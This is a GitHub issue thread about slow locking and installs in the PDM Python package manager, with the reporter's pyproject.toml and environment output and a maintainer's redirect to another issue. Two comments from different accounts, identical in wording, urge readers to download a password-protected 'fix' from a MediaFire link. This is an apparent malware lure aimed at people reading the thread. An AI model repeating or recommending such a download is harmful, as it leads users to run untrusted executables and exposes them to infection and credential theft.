### ISSUE TITLE
The PDM lock has been occupied for a very long time.

### ISSUE THREAD

**Issue by zhuwenxing** [pdm-project/pdm#3131]
- [x] I have searched the issue tracker and believe that this is not a duplicate.

**Make sure you run commands with `-v` flag before pasting the output.**

## Steps to reproduce

pyproject.toml
```
[project]
name = "milvus-dataset"
version = "0.1.0"
description = "A package for managing datasets with Milvus integration"
authors = [
    {name = "Your Name", email = "your.email@example.com"},
]
dependencies = [
    "pandas>=2.2.2",
    "numba>=0.60.0",
    "numpy>=1.24.3",
    "scipy>=1.4.0",
    "scikit-learn>=1.5.1",
    "pymilvus>=2.0.0",
    "pydantic>=1.8.0",
    "boto3>=1.17.0",
    "pyarrow>=16.1.0",
    "filelock>=3.15.4",
    "dask[complete]>=2024.7.0",
    "grpcio>=1.63.0",
    "loguru>=0.7.2",
    "torch>=2.2.2",
    "transformers>=4.44.2",
    "matplotlib>=3.9.2",
    "s3fs>=2024.6.1"
]
requires-python = "==3.10.*"
readme = "README.md"
license = {text = "MIT"}

[build-system]
requires = ["pdm-pep517>=1.0.0"]
build-backend = "pdm.pep517.api"

[tool.pdm.dev-dependencies]
test = [
    "pytest>=6.0.0",
]
lint = [
    "black>=20.8b1",
    "isort>=5.7.0",
    "mypy>=0.800",
]

[tool.pdm.scripts]
test = "pytest tests/"
lint = "black src/ tests/ && isort src/ tests/ && mypy src/"

```

I want to use `pdm add s3fs`, but this op hangs a long time. So I use `uv pip install s3fs` and got the result `s3fs==2024.6.1`

Then I add `"s3fs>=2024.6.1"` to dependencies and do `pdm install`

![image](https://github.com/user-attachments/assets/6020d229-234a-4b36-96b3-00ab83cde52a)
![image](https://github.com/user-attachments/assets/87ce8f6a-c6d9-4ffa-bb63-17b4341bdaa8)
![image](https://github.com/user-attachments/assets/c8ef71cf-45ad-4c3f-b075-5fe66b74f229)

## Actual behavior
cost a lot of time

## Expected behavior
can be more faster

## Environment Information

```bash
# Paste the output of `pdm info && pdm info --env` below:

```
```
PDM version:
  2.18.1
Python Interpreter:
  /root/workspace/milvus-dataset/.venv/bin/python (3.10)
Project Root:
  /root/workspace/milvus-dataset
Local Packages:
```

```
{
  "implementation_name": "cpython",
  "implementation_version": "3.8.10",
  "os_name": "posix",
  "platform_machine": "x86_64",
  "platform_release": "4.18.0-477.21.1.el8_8.x86_64",
  "platform_system": "Linux",
  "platform_version": "#1 SMP Tue Aug 8 21:30:09 UTC 2023",
  "python_full_version": "3.10.14",
  "platform_python_implementation": "CPython",
  "python_version": "3.10",
  "sys_platform": "linux"
}
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by frostming** [comment]
Redirect to #2633
